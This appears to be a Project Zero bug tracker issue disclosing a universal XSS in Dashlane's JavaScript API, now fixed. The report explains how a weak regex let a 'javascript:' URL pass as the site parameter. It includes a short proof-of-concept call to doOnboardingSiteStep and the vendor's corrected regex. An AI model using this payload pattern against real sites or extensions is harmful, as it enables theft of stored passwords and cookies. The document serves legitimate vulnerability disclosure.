Monorail Project: project-zero Issues People Development process History Sign in
New issue
Advanced search Search tips
Starred by 1 user
Status: Fixed
Owner:
Closed: Sep 2016
Cc:



Sign in to add a comment
Dashlane: universal XSS in doOnboardingSiteStep API
Project Member Reported by taviso@google.com, Aug 11 2016 Back to list
Browsing through the dashlane javascript API, doOnboardingSiteStep uses the regex /:\/\/(.[^\/]+)/ to validate the site parameter, but that also matches javascript:alert(1)//://whatever.

This results in a universal XSS, allowing any site to XSS any other site - and therefore access cookies and user data, steal passwords and credentials for any website, etc, etc. Something like this should work:

dashlaneAPI.init({});
window.open('https://mail.google.com'); // must be in a click event handler to disable popup blocker - can be any site
dashlaneAPI.global.isInstalled(function(err,
                                        isInstalled,
                                        communicationObject) {
 communicationObject.callAPI('getUserOnboardingSites', null, function () {});
 communicationObject.callAPI('doOnboardingSiteStep', {
     site: 'javascript:alert(1);//://twitter.com'
 }, function () {});
});

I'm going to list this as critical severity even though it's not a remote code execution, because the sole intent of the product is to protect website passwords and this effectively allows you to steal all password.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

 
Project Member Comment 1 by taviso@google.com, Aug 11 2016
Here's an ugly demo, it's probably not reliable due to timing. You need the dashlane javascript api file, I just copied the minified version from dashlane.com.
dashlane.html
984 bytes View Download
Comment 2 Deleted
Comment 3 Deleted
Project Member Comment 4 by taviso@google.com, Aug 11 2016
I looked at their fix, they now do:

var b = d.site.match(/^https?:\/\/([.-a-z0-9_^/]+)/i);

which seems good to me.

Comment 5 Deleted
Project Member Comment 6 by taviso@google.com, Sep 6 2016
Labels: -Restrict-View-Commit -Severity-High Severity-HIgh
Status: Fixed
The fixes are live now, it took so long because Apple review all updates to the appstore.
Sign in to add a comment